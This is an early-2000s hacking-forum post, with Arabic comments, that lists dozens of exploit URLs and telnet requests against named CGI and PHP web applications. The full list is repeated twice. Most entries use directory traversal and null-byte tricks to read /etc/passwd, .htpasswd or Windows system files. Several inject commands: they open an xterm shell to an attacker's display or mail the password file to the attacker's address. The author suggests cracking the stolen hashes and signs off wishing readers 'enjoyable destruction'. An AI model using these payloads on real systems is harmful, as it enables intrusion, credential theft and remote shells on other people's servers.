zAKoO LoRd
29-09-2003, 01:15
http://www.victim.com/cgi-bin/bb-hist.sh?HISTFILE=/home/*
================================================== ==========
Example:
http://www.target.com/cgi-bin/apexec.pl?etype=odp&template=../../../../
../../../../../etc/resolv.conf%00.html&passurl=/category/
================================================== =================
Exploit:
To view their c:\winnt\win.ini:
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog
================================================== ====================
Exploit:
http://blah.somenonexistanthost.com/cgi-bin/anacondaclip.pl?\
template=../../../../../../../../../../../../../../../../../../etc/passwd
================================================== =====================
Exploit:
telnet target.machine.com 80
GET /cfdocs/expelval/openfile.cfm HTTP/1.0
GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0
GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0
================================================== ============================
About : Commerce.cgi can have your store's catalog up
and running on the web in literally a couple
of hours. The easy to use Store Manager will
even allow you to add and remove products from
your inventory right through your web browser.
Best of all, it's free, vulnerable & open source.
Exploit:
lynx http://VULNERABLE.com/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
(take note of the the "index.html" being added, it needs that)
================================================== =================================
Exploit:
lynx http://victim.com/scripts/convert.bas?../../etc/passwd
================================================== ===============================
Standart perl problem is in statistic module - file: hsx.cgi, script does not filter ../ and %00. Through this bug, you can remotely read any file and make listing of directory. ../ - directory up, %00 hex symbol, that means end of line.
Exploit:
lynx http://www.victim.ru/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
================================================== ===============================
Name : ikonboard
Problem: $inhelpon = $query -> param('helpon');
Exploit:
lynx http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
================================================== =================================
http://www.target.com/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../etc
================================================== =================================
Name : PerlCal
About : cal_make.pl of the PerlCal script may allow remote users(website visitors) to view any file on a webserver (dependingon the user the webserver is running on).
Exploit:
http://www.VULNERABLE.com/cgi-bin/cal_make.pl?\
p0=../../../../../../../../../../../../etc/passwd%00
================================================== =================================
Exploit:
lynx -source \
'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/passwd'
================================================== =================================
DESCRIPTION
PHPix is a Web-based photo album viewer written in PHP. It features automatic
generation of thumbnails and different resolution files for viewing on the fly.
PHPix Photo Album is available from http://phpix.org
Synnergy has recently discovered a flaw within PHPix that allow a remote user to
traverse a directory as a request to the script using the
$mode=album&album=_some_dir_variable. It is then possible to read any file
or folder's &@#&@#&@#&@#&@#&@#&@#s with priviledges as the httpd.
Example:
http://target.com/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
================================================== =================================
Exploit:
lynx http://www.host.com/cgi-bin/php.cgi?/etc/passwd
================================================== =================================
Exploit:
Affected program: PhotoAlbum v 0.9.9
Any user is able to pass a directory as request
to the script, the script will read the directory
and output all files included in it and has read
access. for instance:
http://www.phpphotoalbum.com/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
================================================== =================================
Exploit:
lynx http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
جربها مع
Tested in Server: Apache/1.3.9 (Unix) PHP/4.0.3pl1 FrontPage/4.0.4.3
================================================== ================================= Exploit:
http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
If sawmill is run as a cgi script, the following can be used instead:
http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
================================================== =================================
Exploit:
http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
================================================== =================================
Exploit:
lynx http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
lynx http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/%00.html
================================================== ================================
Exploit:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../../../../../../../../etc/passwd%00&action=view&matchview=1
This will display the /etc/passwd (if the webserver user has
access to this file).
Another URL can display the source of talkback.cgi itself
that contains the admin password:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../cgi-bin/talkback.cgi%00&action=view&matchview=1
(You might have to use another URL instead of
../cgi-bin/talkback.cgi%00, this depends on where the
cgi-bin is installed)
================================================== =================================
Exploit:
hax0r:/# telnet www.blah.net 80
Trying 200.xx.xx.xx...
Connected to www.blah.net
Escape character is '^]'.
GET /cgi-bin/test-cgi?*
================================================== =================================
Exploit:
'http://www.host.com/cgi-bin/view-source?../../../../../../../etc/passwd'
================================================== =================================
Exploit:
http://www.victim.org/cgi-bin/w3-msql/protected-dir/private-file
note: in this case, the intruder will have to already
know the structure of the directory. The second way:
http://www.victim.org/cgi-bin/w3-msql/protected-dir/.htpasswd
And then you use John The Ripper to decrypt the DES3 encrypted
passwords.
================================================== =================================
Name : "show files" Vulnerability with perl null bite bug.
About : Way-board - is a popular korean board
(http://way.co.kr - official site).
Problem: Through this bug you can see any files, bug works
on every system were perl is installed. "%00" -
means hex symbol of the end of the line, used in
C,C++ and perl.
Exploit:
lynx http://www.victim.com/way-board/way-board.cgi?db=url_to_any_file%00
================================================== ================================
Exploit:
http://example.com/cgi-bin/Web_store/web_store.cgi?page=../../../../.
./../../../etc/passwd%00.html
================================================== =================================
Exploit:
jaxx0r:/# telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET http://server/cgi-bin/wguest.exe?template=c:\boot.ini
================================================== =================================
SUMMARY
- -------
The TalentSoft Web+ server allows users to read arbitrary data files on
the Web server running the webpsvr daemon. By entering a crafted URL any
user with a browser can retrieve files that the webpsvr daemon itself has
access to.
http://yourhost.com/cgi-bin/webplus?script=/../../../../etc/passwd
================================================== =================================
About : WebSPIRS is SilverPlatter's Information Retrieval
System for the World Wide Web (WWW). It is a common
gateway interface (CGI) application which allows any
forms-capable browser, such as Netscape, to search
SilverPlatter (SP) Electronic Reference Library (ERL)
databases available over the Internet.
http://www.silverplatter.com.
Problem: Problem lyes in incorrect validation of user submitted
-by-browser information, that can show any file of the
system where script installed.
Exploit:
lynx http://www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd
================================================== =================================
Exploit:
http://sgi.victim/cgi-bin/wrap?/../../../../../etc
================================================== =================================
Exploit:
http://www.my_target.com/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00
================================================== =================================
About : script "HIS Auktion 1.62" is a catalog of links CGI
script. The creators site http://www.his-software.de
Problem: -------from auktion.pl-------
sub readfile {
local($filename)=$_0;
local(@array);
open(f,$filename);
----------------------------
$filename - is not filterred on symbols.
Exploit:
lynx http://www.victim.com/cgi-bin/auktion.pl?menue=/bin/id
================================================== =================================
Exploit:
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
================================================== =================================
Name : remote command execution vulnerability
Problem: WebUtil - A collection of net commands by The
Puppet Master. A hole can lead to command execution
on remote server running this perl script.
Exploit:
Access this sites and type "|id|" in "Web Name or IP Address:"
form field.
http://server/cgi-bin/webutil.pl?ping
http://server/cgi-bin/webutil.pl?traceroute
http://server/cgi-bin/webutil.pl?whois
http://server/cgi-bin/webutil.pl?finger
http://server/cgi-bin/webutil.pl?nslookup
http://server/cgi-bin/webutil.pl?host
http://server/cgi-bin/webutil.pl?dnsquery
http://server/cgi-bin/webutil.pl?calendar
هذه على ما اأظن تجيب لك معلومات مهمة جداً
================================================== =================================
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
&@#&@#&@#&@#&@#&@#&@#-length: 85 (replace 85 with length of the "exploit" line)
receiver=;mail+your_address\@somewhere.org< /etc/passwd;&sender=a&rtnaddr=a&subject=a
&&@#&@#&@#&@#&@#&@#&@#=a
Don't worry if the server displays an error message. The password file is
on the way :).
ههههههههههه شوف ايش يقول لك لا نتزعج من رسالة الخطأ التي ستظهر لك .الباسوورد على الطريق يا حبيبي
================================================== ======================
Exploit:
http://www.host.org/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh
================================================== =======================
Exploit:
http://www.htdig.org/cgi-bin/htsearch?exclude=%60/etc/passwd%60
================================================== =======================
Exploit:
lynx www.host.com/cgi-bin/excite;IFS="$";/bin/cat /etc/passwd|mail your_email_here;
================================================== =====================
عند نقل الموضوع لمنتدى اخر ارجو كتابة اسم كاتب الموضوع...وشكراً
مع تحياتي بتدمير ممتع
أخوكم....
zAKoO LoRd
================================================== ==========
Example:
http://www.target.com/cgi-bin/apexec.pl?etype=odp&template=../../../../
../../../../../etc/resolv.conf%00.html&passurl=/category/
================================================== =================
Exploit:
To view their c:\winnt\win.ini:
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog
================================================== ====================
Exploit:
http://blah.somenonexistanthost.com/cgi-bin/anacondaclip.pl?\
template=../../../../../../../../../../../../../../../../../../etc/passwd
================================================== =====================
Exploit:
telnet target.machine.com 80
GET /cfdocs/expelval/openfile.cfm HTTP/1.0
GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0
GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0
================================================== ============================
About : Commerce.cgi can have your store's catalog up
and running on the web in literally a couple
of hours. The easy to use Store Manager will
even allow you to add and remove products from
your inventory right through your web browser.
Best of all, it's free, vulnerable & open source.
Exploit:
lynx http://VULNERABLE.com/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
(take note of the the "index.html" being added, it needs that)
================================================== =================================
Exploit:
lynx http://victim.com/scripts/convert.bas?../../etc/passwd
================================================== ===============================
Standart perl problem is in statistic module - file: hsx.cgi, script does not filter ../ and %00. Through this bug, you can remotely read any file and make listing of directory. ../ - directory up, %00 hex symbol, that means end of line.
Exploit:
lynx http://www.victim.ru/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
================================================== ===============================
Name : ikonboard
Problem: $inhelpon = $query -> param('helpon');
Exploit:
lynx http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
================================================== =================================
http://www.target.com/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../etc
================================================== =================================
Name : PerlCal
About : cal_make.pl of the PerlCal script may allow remote users(website visitors) to view any file on a webserver (dependingon the user the webserver is running on).
Exploit:
http://www.VULNERABLE.com/cgi-bin/cal_make.pl?\
p0=../../../../../../../../../../../../etc/passwd%00
================================================== =================================
Exploit:
lynx -source \
'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/passwd'
================================================== =================================
DESCRIPTION
PHPix is a Web-based photo album viewer written in PHP. It features automatic
generation of thumbnails and different resolution files for viewing on the fly.
PHPix Photo Album is available from http://phpix.org
Synnergy has recently discovered a flaw within PHPix that allow a remote user to
traverse a directory as a request to the script using the
$mode=album&album=_some_dir_variable. It is then possible to read any file
or folder's &@#&@#&@#&@#&@#&@#&@#s with priviledges as the httpd.
Example:
http://target.com/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
================================================== =================================
Exploit:
lynx http://www.host.com/cgi-bin/php.cgi?/etc/passwd
================================================== =================================
Exploit:
Affected program: PhotoAlbum v 0.9.9
Any user is able to pass a directory as request
to the script, the script will read the directory
and output all files included in it and has read
access. for instance:
http://www.phpphotoalbum.com/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
================================================== =================================
Exploit:
lynx http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
جربها مع
Tested in Server: Apache/1.3.9 (Unix) PHP/4.0.3pl1 FrontPage/4.0.4.3
================================================== ================================= Exploit:
http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
If sawmill is run as a cgi script, the following can be used instead:
http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
================================================== =================================
Exploit:
http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
================================================== =================================
Exploit:
lynx http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
lynx http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/%00.html
================================================== ================================
Exploit:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../../../../../../../../etc/passwd%00&action=view&matchview=1
This will display the /etc/passwd (if the webserver user has
access to this file).
Another URL can display the source of talkback.cgi itself
that contains the admin password:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../cgi-bin/talkback.cgi%00&action=view&matchview=1
(You might have to use another URL instead of
../cgi-bin/talkback.cgi%00, this depends on where the
cgi-bin is installed)
================================================== =================================
Exploit:
hax0r:/# telnet www.blah.net 80
Trying 200.xx.xx.xx...
Connected to www.blah.net
Escape character is '^]'.
GET /cgi-bin/test-cgi?*
================================================== =================================
Exploit:
'http://www.host.com/cgi-bin/view-source?../../../../../../../etc/passwd'
================================================== =================================
Exploit:
http://www.victim.org/cgi-bin/w3-msql/protected-dir/private-file
note: in this case, the intruder will have to already
know the structure of the directory. The second way:
http://www.victim.org/cgi-bin/w3-msql/protected-dir/.htpasswd
And then you use John The Ripper to decrypt the DES3 encrypted
passwords.
================================================== =================================
Name : "show files" Vulnerability with perl null bite bug.
About : Way-board - is a popular korean board
(http://way.co.kr - official site).
Problem: Through this bug you can see any files, bug works
on every system were perl is installed. "%00" -
means hex symbol of the end of the line, used in
C,C++ and perl.
Exploit:
lynx http://www.victim.com/way-board/way-board.cgi?db=url_to_any_file%00
================================================== ================================
Exploit:
http://example.com/cgi-bin/Web_store/web_store.cgi?page=../../../../.
./../../../etc/passwd%00.html
================================================== =================================
Exploit:
jaxx0r:/# telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET http://server/cgi-bin/wguest.exe?template=c:\boot.ini
================================================== =================================
SUMMARY
- -------
The TalentSoft Web+ server allows users to read arbitrary data files on
the Web server running the webpsvr daemon. By entering a crafted URL any
user with a browser can retrieve files that the webpsvr daemon itself has
access to.
http://yourhost.com/cgi-bin/webplus?script=/../../../../etc/passwd
================================================== =================================
About : WebSPIRS is SilverPlatter's Information Retrieval
System for the World Wide Web (WWW). It is a common
gateway interface (CGI) application which allows any
forms-capable browser, such as Netscape, to search
SilverPlatter (SP) Electronic Reference Library (ERL)
databases available over the Internet.
http://www.silverplatter.com.
Problem: Problem lyes in incorrect validation of user submitted
-by-browser information, that can show any file of the
system where script installed.
Exploit:
lynx http://www.target.com/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd
================================================== =================================
Exploit:
http://sgi.victim/cgi-bin/wrap?/../../../../../etc
================================================== =================================
Exploit:
http://www.my_target.com/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00
================================================== =================================
About : script "HIS Auktion 1.62" is a catalog of links CGI
script. The creators site http://www.his-software.de
Problem: -------from auktion.pl-------
sub readfile {
local($filename)=$_0;
local(@array);
open(f,$filename);
----------------------------
$filename - is not filterred on symbols.
Exploit:
lynx http://www.victim.com/cgi-bin/auktion.pl?menue=/bin/id
================================================== =================================
Exploit:
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
================================================== =================================
Name : remote command execution vulnerability
Problem: WebUtil - A collection of net commands by The
Puppet Master. A hole can lead to command execution
on remote server running this perl script.
Exploit:
Access this sites and type "|id|" in "Web Name or IP Address:"
form field.
http://server/cgi-bin/webutil.pl?ping
http://server/cgi-bin/webutil.pl?traceroute
http://server/cgi-bin/webutil.pl?whois
http://server/cgi-bin/webutil.pl?finger
http://server/cgi-bin/webutil.pl?nslookup
http://server/cgi-bin/webutil.pl?host
http://server/cgi-bin/webutil.pl?dnsquery
http://server/cgi-bin/webutil.pl?calendar
هذه على ما اأظن تجيب لك معلومات مهمة جداً
================================================== =================================
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
&@#&@#&@#&@#&@#&@#&@#-length: 85 (replace 85 with length of the "exploit" line)
receiver=;mail+your_address\@somewhere.org< /etc/passwd;&sender=a&rtnaddr=a&subject=a
&&@#&@#&@#&@#&@#&@#&@#=a
Don't worry if the server displays an error message. The password file is
on the way :).
ههههههههههه شوف ايش يقول لك لا نتزعج من رسالة الخطأ التي ستظهر لك .الباسوورد على الطريق يا حبيبي
================================================== ======================
Exploit:
http://www.host.org/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh
================================================== =======================
Exploit:
http://www.htdig.org/cgi-bin/htsearch?exclude=%60/etc/passwd%60
================================================== =======================
Exploit:
lynx www.host.com/cgi-bin/excite;IFS="$";/bin/cat /etc/passwd|mail your_email_here;
================================================== =====================
عند نقل الموضوع لمنتدى اخر ارجو كتابة اسم كاتب الموضوع...وشكراً
مع تحياتي بتدمير ممتع
أخوكم....
zAKoO LoRd